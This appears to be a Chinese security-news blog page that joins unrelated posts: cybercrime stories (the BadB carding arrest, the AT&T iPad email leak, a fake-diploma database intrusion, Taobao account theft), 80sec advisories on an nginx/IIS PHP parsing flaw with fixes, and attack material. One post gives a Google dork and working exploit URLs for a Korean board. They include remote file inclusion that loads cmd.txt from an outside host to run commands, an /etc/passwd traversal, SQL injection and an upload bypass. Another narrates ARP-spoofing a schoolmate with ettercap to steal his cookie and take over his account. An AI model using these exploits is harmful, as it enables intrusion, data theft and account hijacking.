在互联网上，BadB大名鼎鼎，尽管遭到美国情报部门的围追堵截，但他仍能纵横在虚拟的世界中，盗取和出售大量信用卡号。在现实的世界里，他几乎不 可能被抓住，因为他居住在俄罗斯。BadB的真名叫Vladislav AHorohorin，他的落网让我们得以一窥俄罗斯黑客世界的真实情况，那些俄罗斯黑客大多受过良好教育，有些还是极具创造力的程序员，对网络贸易构成 了巨大的安全威胁。

由于能力上的不足、机构腐败或民族自豪感等种种原因，俄罗斯执法部门一直不愿抓捕这些才华横溢的网络欺诈罪犯。 据美国特工处调查副主管Michael PMerritt发表的一份声明称，在这种环境下，BadB的网络逐渐脱颖而出，成为全球最复杂的网络金融犯罪组织之一。

早在2009年 11月的时候，美国华盛顿司法部长办公室就曾在一项秘密指控中认定BadB就是Horohorin，当时Horohorin年仅27 岁，拥有乌克兰和以色列国籍，长期定居在莫斯科。直到今年8月7日，Horohorin才在旅法期间在法国南部奈斯机场登机返回俄罗斯的时候被美国委托法 国警方逮捕。美国特工处于8月11日发表声明，对Horohorin提出不公开指控。美国特工处发言人Max Milien称，特工处不会就决定在法国逮捕Horohorin一事发表评论。

国际刑警组织俄罗斯办公司发言人Olga KShklyarova称，美国执法机构没有要求国际刑警组织俄罗斯办公司在俄罗斯逮捕Horohorin。她说：“我们没有接到过这样的要求。”据美国 特工处发表的声明称，Horohorin为黑客们管理着大量网站，他们窃取了大量信用卡号并且匿名在全球各地销售。购买那些信用卡资料的人在使用欺诈账单 时要冒更大的风险，那些信用卡资料都是在一些名为CarderPlanet的网站上转手的，付费则通过一家类似于PayPal的俄罗斯网络付费系统 Webmoney间接完成。

许多俄罗斯电脑罪犯都宣扬民族主义，在Horohorin出售其窃取的美国信用卡数据的某个网站上，还放置了一段俄罗斯总理普京向俄罗斯黑客授勋的动画片。网站用英语打出的口号称：“我们等你来共同对抗美帝国主义。”

Horohorin 一直自由居住在莫斯科。据俄罗斯电子通信协会发言人Dmitri Zakharov称，Horohorin是以外国人的身份在俄罗斯警方注册的。在俄罗斯，很少有人因为电脑犯罪而被捕，即使居住的俄罗斯的黑客已经被公开 确定为外国电脑犯罪组织的成员也不会被捕。

美国联邦调查局在2002年以虚假求职面试邀约的方式将一位名叫Vasily Gorshkov的嫌疑犯引渡到美国，而没有向俄罗斯警方求助。 为了获取案件的证据，联邦调查局电脑专家攻破了Gorshkov在俄罗斯的电脑。这一系列事件曝光后，俄罗斯当局对此表示极度愤怒。

Zakharov说，在线欺诈并不是俄罗斯警方的优先打击罪案，因为大多数在线欺诈的对象都是欧洲或美国的电脑用户。他说：“这就是俄罗斯的垃圾邮件发送者不会被逮捕的主要原因。”

这其中也有一定的政治因素。 俄罗斯研究机构信息安全研究所（the Institute of Information Security）副所长Vladimir Sokolov称，尽管美国和俄罗斯在认定和对待计算机安全基本问题上的差异正在缩小，但是双方仍存在一定争议。美国认为计算机安全是一项执法事务，是执 法机关的责任。 俄罗斯则奉行国际条约，即只对军方或谍报机关使用网络武器进行监管。 去年，美国开启了一项谈判，但它仍迫切要求两国更进一步地开展执法合作。

美国计算机安全研究界则提出了更悲观的假设，他们认为俄罗斯情报机关已经与计算机网络罪犯展开合作，情报机关为俄罗斯网络罪犯提供保护，作为交换，网络罪犯则为情报机关提供专业技术服务或出于政治目的利用他们的傀儡网络对持不同政见的网站发起攻击。

以前，网络攻击造成的损失都是很快见效的。 比如，一年前，一批黑客利用傀儡网络向格鲁吉亚的一家政治博客网站的社群网帐户发送了大量垃圾信息。但是后来那次攻击最终失控并导致Twitter的全球 服务中断，Facebook和LiveJournal的服务也受到了影响，全球共有数千万计算机用户受到影响。俄罗斯当局多次否认政府与这种攻击有关联。

Spamhaus 称，全球前10大垃圾邮件发送者有7人居住在前苏联地区，包括乌克兰、俄罗斯和爱沙尼亚等。更糟糕的是，西方执法机关已经发现一段 专为攻击银行网站的软件代码。2007年，瑞典安全专家发现一位绰号叫Corpse的俄罗斯黑客就是某个病毒的作者，那个病毒可记录用户电脑的键盘操作， 从而窃取瑞典银行Nordea的账户密码。失窃账户共损失了大约100万美元。

自从Horohorin被捕，badb.biz网站就一直处于关闭状态。但是至少在周一的时候，另一家名为carder.su的CarderPlanet网站仍处于正常营业状态。

联邦警卫局声称，这个网站没有涉及国家机关秘密的信息，不过仍需要对此事件造成的影响进行评估。 俄罗斯联邦警卫局是保护国家高级领导人如总统梅德韦杰夫和总理普京安全的机构，另外，还负责莫斯科红场以及那里的列宁陵墓的安全。

骇世黑客

□ 作者：余开亮、张兵

来源网络，如侵犯作者版权，请告知。

目　录
第一章 罪犯抑或牛仔：黑客文化略谈
第二章天才与鬼才之间：黑客精英轶事(1)
第二章天才与鬼才之间：黑客精英轶事(2)
第三章潘多拉的魔盒：黑客与计算机的病毒情缘
第四章时代双娇：黑客与网站的龙虎风云
第五章禁区的幽灵：黑客对政府权威机构的入侵（1）
第五章禁区的幽灵：黑客对政府权威机构的入侵（2）
第六章黑客帝国的无辜者：受黑的民用机构
第七章网络新危机：黑客经济犯罪透视(1)
第七章网络新危机：黑客经济犯罪透视(2)
第八章敞开的所罗门魔瓶：网络空间的色情传播
第九章网络无界人有界：黑客的民族情结
第十章无硝烟的战争：黑客与现代信息战
附录
后记

简体中文TXT下载地址:骇世黑客

原文:http://news.yesky.com/231/11377231.shtml

据国外媒体报道，FBI已经介入调查iPad用户电子邮件信息泄露事件。但其中疑点重重，事情远远尚未结束。

6月10日，据外国媒体报导，电信运营商AT&T为苹果iPad提供无线网络服务的网站存在安全漏洞，该漏洞使得14.4万名iPad 用户的电子邮箱地址等隐私被泄露。因为苹果公司要求用户必须用电邮形式在AT&T网站上注册并激活iPad，因此AT&T网站存有大量 iPad用户信息。一个黑客组织Gotase Security9日宣布，他们利用AT&T的网站漏洞，获得约11.4万个iPad用户的邮件地址，而且还获得这些用户的身份识别码。

该组织通过发送包含iPad SIM卡序号的HTTP要求，使得AT&T网站误判而暴露了用户的邮箱地址，这些序号(称为ICC-ID)则是采用连续码产生。AT&T 周二紧急关闭了这项提供邮箱地址的服务，此后一天科技博客Valleywag首次报道了这一事件。

事后Gotase Security组织发言称他们的行为是合乎道德的，并未违反法律，且完全是为了维护公共利益，因为可以避免AT&T的客户的资料遭受真正的恶意盗取。

据悉，被泄露了电邮地址的用户包括白宫办公厅主任拉姆·伊曼纽尔、纽约市长迈克尔·布隆伯格，《纽约时报》、《时代》杂志、新闻集团等传媒巨头首席执行官，联邦航空局、国土安全部、国家航空航天局员工，多家金融机构员工，以及空军上校威廉·埃尔德里奇。

AT&T宣布他们已经于9号修补好了该漏洞，但是事情还远远没有结束，有更多的媒体和博客就此事情进行了进一步探讨，内容主要围绕一个责任问题——不管是苹果还是AT&T，或者Gotase Security组织都应对此有一个解释。不过现在除了Gotase Security 和Valleywag一直在谈论此事情，AT&T和苹果公司都保持缄默，FBI相关调查人员也拒绝透露进一步消息。

这样严重的一个安全漏洞造成的影响是不可预测的。FBI害怕这样的计算机入侵事件会对国家安全构成威胁，开始调查潜在的网络威胁。 Valleywag声称FBI已经要求该博客安全保留Gotase Security透露给它的隐私信息。

那么回溯整个过程，Gotase Security 声称“完全是为了维护公共利益”，那么在Gotase Security组织把相关信息透露给Valleywag博客，并且让全世界都知道AT&T存在安全漏洞之前，是否已经通知了AT&T这个问题呢？Valleywag博客为Gawker Media拥有，Gawker Media旗下的Gizmodo博客曾经曝光苹果iPhone4遗失事件。

Gotase Security周四晚上发声明说尽管他们没有通知AT&T，但是他们确保会有人通风报信，在相关信息到达Valleywag博客之前 AT&T能修补上漏洞。“我们没兴趣直接与AT&T接触，但是在披露之前我们非常有耐心的等待他们‘做好自家内务，修好自家漏洞’，并且我们没有通过这件事情榨取一分钱。只有一个Gawker的记者看到了这些信息，并且这些信息进行了一些编辑才登出。”

Goatse 还说“我们所有数据的收集都是通过一个没有密码的公共网络服务器，网上的任何人都可以进入，我们的行为没有违法，没有入侵，没有渗透”，“我们没有把你的信息出售给垃圾邮件发送者，我们更没有试图攻击你的iPad。相反你的ipad正因为我们而更安全。”

“我们需要做出这些澄清，iPad 3G的用户有权利知道他们的信息不安全而及时采取措施。”Goatse表示。

那么整个过程究竟谁该负责任呢？显然Gotase Security给AT&T上了一堂惊险又窘迫的“安全课程”，AT&T在登记用户信息方面应该采取一种新的方法，AT&T可能想让用户在注册时更简单一些，但是却忽略了安全隐患，这是AT&T的失职。Gotase Security这种方式当然不会被提倡，何况真真假假虚虚实实之中，谁也不能保障说“被暴露的用户隐私信息目前及以后都是安全的”。经历此事件之后，苹果这些公司应该会更加关注网络运营商在用户信息注册方面的流程，毕竟以个人邮件方式在网络上注册和激活产品需要更加安全的保护措施。

关于此事件的进一步信息还需要等待FBI的进一步调查。

无意中发现的，名字未知，版本不详，问题一堆

Google Dork: inurl:bbs_sun/board.php

board.php文件内容如下:

————————–
<?
if(!$admin) $pgUp .= “../”;
else if($admin==’N') $pgUp .= “”;

include $pgUp.”inc/dbconn.php”;
include $pgUp.”bbs_sun/config.php”;
?>

<link href=”<?=$skinSrc?>/style.css” rel=”stylesheet” type=”text/css”>
<?
if($mode == “list”) include ($skinSrc.”/list.php”);
else if($mode == “write” || $mode == “modify” || $mode == “reply”) include ($skinSrc.”/write.php”);
else if($mode == “view”) include ($skinSrc.”/view.php”);
else if($mode == “delete” || $mode == “ment_delete”) include ($skinSrc.”/delete.php”);
?>
————————–

此处存在远程文件包含漏洞

EXP:

http://xxxx.kr/bbs_sun/board.php?admin=0x50sec.org&pgUp=http://www.0x50sec.org/evil.txt?

board.php?admin=0x50sec.org&pgUp=http://www.0x50sec.org/evil.txt?&skinSrc=http://www.0x50sec.org/cmd.txt?&cmd=id&mode=view

有的含有download.php文件，对file变量和bname变量都没有进行必要的检查，导致文件泄漏漏洞:

EXP:

http://xxxx.kr/s_board_text/download.php?file=../../../../../etc/passwd&bname=../

mode变量为view时,有的版本对number变量没有过滤导致SQL注射漏洞

mode=view&number=

mode变量为write时,有的版本对管理权限的验证存在问题可以被绕过，从而可以发布文章和上传文件。

打开一条记录，将mode=view直接改为write就可以上传了。

可能还存在其他的问题比如文件删除等，懒得看了。

被抓获的网络”黑客”是22岁的男青年李某，毕业于西安市一家计算机专科学校。今年1月8日，教育部学位与研究生教育发展中心网站被侵入，”黑客” 大肆篡改了考试成绩数据，并借此伪造了大量2009年度工程硕士学位、学士学位等学历证书，通过变卖流入社会，造成极大危害。案发后，公安部责成山东警方全力侦办。 6月4日，山东警方查明犯罪嫌疑人李某藏身于芮城县，遂迅速赶赴该地抓捕。运城市公安局网警支队、芮城县公安局网警大队配合行动， 终于在6月6日早晨将李某抓获。警方随后查明，李某从2009年下半年起，多次与深圳、合肥、武汉、济南等地的”黑客”勾结在一起，联手攻击教育部网站， 入侵数据库篡改数据，伪造各种学历证书200余个，公共英语证书20余个，非法获利4万余元。

目前，此案已移交山东警方，李某已被刑事拘留。

“在淘宝买了东西然后再去看一场电影，谁知看完电影回来，发现在淘宝的数笔交易都显示退款了。这已经是第二次了！”在越秀区一外贸公司上班的小娟表示很诧异。小娟说，昨晚黑客又成功潜入自己的电脑，盗走她的淘宝账号，以申请退款为由转移他人交易，获取退款600元。“上个月淘宝账号被盗后，我就已经加强防范了，谁知还是防不胜防。”

幸好，当小娟发现自己的购物交易全被申请退款时，她及时与卖家联络查证，最终挽回了两笔正在协商退款的交易，而其他四笔交易则被黑客偷梁换柱。

第一次被黑客盗号退款，小娟当作是教训，而又一次被盗号，小娟则愤愤不平。“那个卖家也觉得诧异，问我为什么退款时，而我没回应。想不到原来是黑客搞的鬼。”她希望那些黑客们应该要用知识去创造财富，而不是去犯罪。同时，她也呼吁各位淘宝卖家受到退款信息后一定要电脑联系买主，而不要轻信阿里旺旺上的留言。

据不完全统计数据显示，2009年网购总金额约为2500亿元左右，面对如此大的消费市场，一些网络黑客利用网购技术陷阱，大肆骗取用户钱财。

有网购消费者表示，安全软件的不断升级，网银被盗的事情也在升级，黑客攻击的招数更层出不穷。即使网上有各种各类的网购防骗手册，但是所列出的防骗招数根本不足以应付技术越来越“恐怖”的黑客。

如何加强网购的安全防治呢？有从事多年计算机控制工作的高级工程师张先生则表示目前很难做到网络绝对安全。“平时上网尽量避开不正规的网站，一般这类网站经常被挂上木马；不要随意在网上发布个人资料，如电话号码、银行卡号、身份证号码等；及时查杀病毒，清理电脑垃圾，同时杀毒别忘了及时更新杀毒软件。”

网友支招：尽量用支付宝交易，收到货物后再确认付款。同时别忘了定期给电脑杀杀毒，倘若电脑病毒破坏了支付宝的安全性，支付页面会跳到虚假付款页面，最后不但收不到货，连钱也被黑客偷走，上演一场“狸猫换太子”。

漏洞介绍：nginx是一款高性能的web服务器，使用非常广泛，其不仅经常被用作反向代理，也可以非常好的支持PHP的运行。80sec发现其中存在一个较为严重的安全问题，默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析，这将导致严重的安全问题，使得恶意的攻击者可能攻陷支持php的nginx服务器。

漏洞分析：nginx默认以cgi的方式支持php的运行，譬如在配置文件当中可以以

location ~ \.php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
include fastcgi_params;
}

的方式支持对php的解析，location对请求进行选择的时候会使用URI环境变量进行选择，其中传递到后端Fastcgi的关键变量 SCRIPT_FILENAME由nginx生成的$fastcgi_script_name决定，而通过分析可以看到$fastcgi_script_name是直接由URI环境变量控制的，这里就是产生问题的点。而为了较好的支持PATH_INFO的提取，在PHP 的配置选项里存在cgi.fix_pathinfo选项，其目的是为了从SCRIPT_FILENAME里取出真正的脚本名。
那么假设存在一个http://www.80sec.com/80sec.jpg，我们以如下的方式去访问

http://www.80sec.com/80sec.jpg/80sec.php

将会得到一个URI

/80sec.jpg/80sec.php

经过location指令，该请求将会交给后端的fastcgi处理，nginx为其设置环境变量SCRIPT_FILENAME，内容为

/scripts/80sec.jpg/80sec.php

而在其他的webserver如lighttpd当中，我们发现其中的SCRIPT_FILENAME被正确的设置为

/scripts/80sec.jpg

所以不存在此问题。
后端的fastcgi在接受到该选项时，会根据fix_pathinfo配置决定是否对SCRIPT_FILENAME进行额外的处理，一般情况下如果不对fix_pathinfo进行设置将影响使用PATH_INFO进行路由选择的应用，所以该选项一般配置开启。Php通过该选项之后将查找其中真正的脚本文件名字，查找的方式也是查看文件是否存在，这个时候将分离出SCRIPT_FILENAME和PATH_INFO分别为

/scripts/80sec.jpg和80sec.php

最后，以/scripts/80sec.jpg作为此次请求需要执行的脚本，攻击者就可以实现让nginx以php来解析任何类型的文件了。

POC： 访问一个nginx来支持php的站点，在一个任何资源的文件如robots.txt后面加上/80sec.php，这个时候你可以看到如下的区别：

访问http://www.80sec.com/robots.txt

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

访问访问http://www.80sec.com/robots.txt/80sec.php

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6

其中的Content-Type的变化说明了后端负责解析的变化，该站点就可能存在漏洞。

漏洞厂商：http://www.nginx.org

解决方案：

我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失

关闭cgi.fix_pathinfo为0

或者

if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}

PS: 鸣谢laruence大牛在分析过程中给的帮助

漏洞介绍：IIS是微软推出的一款webserver，使用较为广泛，在支持 asp/asp.net的同时还可以较好的支持PHP等其他语言的运行。但是80sec发现在IIS的较高版本中存在一个比较严重的安全问题，在按照网络上提供的默认配置情况下可能导致服务器泄露服务器端脚本源码，也可能错误的将任何类型的文件以PHP的方式进行解析，使得恶意的攻击者可能攻陷支持PHP 的IIS服务器，特别是虚拟主机用户可能受的影响较大。

漏洞分析：
IIS支持以CGI的方式运行PHP，但是此种模式下，IIS处理请求的时候可能导致一些同80sec提到的nginx安全漏洞一样的问题，任何用户可以远程将任何类型的文件以PHP的方式去解析，你可以通过查看Phpinfo中对php的支持方式，其中如果为CGI/FAST-CGI就可能存在这个问题。

黑盒访问

http://www.80sec.com/robots.txt/1.php

查看文件是否存在和返回的HTTP头就可以知道是否存在此漏洞。

同时，如果服务器支持了PHP，但应用中使用的是asp就可以通过如下方式来直接查看服务端asp源码

http://www.80sec.com/some.asp/1.php

漏洞厂商：http://www.microsoft.com

解决方案：

我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失

关闭cgi.fix_pathinfo为0

男子汉大豆腐，焉能言而无信，谁料在我将死对方后，对方居然真的使用了绝技，死不认帐，耍赖皮。

俺只好将其行公布于校内网，结果连我们导师都鄙视那种行为，并鼓励我用板砖拍他。其他围观者也是无不愤然谴责之。谁料这厮利用舆论机器，在校内网颠倒是非、指鹿为马。偶只好进入其校内网，断其话语权，还事实真想于大众。

本来那厮用的网页登录很容易搞到其密码，谁知最近用了个校内网客户端，从那里进入网页，也就不用登录了。这下好，搞不到密码就搞他的cookie吧，反正一样。

ettercap出场，贴图

利用ettercap进行对目标arp欺骗以及嗅探找到目标跟校内网的tcp连接

查看会话校信息找到cookie

利用tamper data修改cookie成功登录校内网，还原事实真想并修改其头像恶搞一下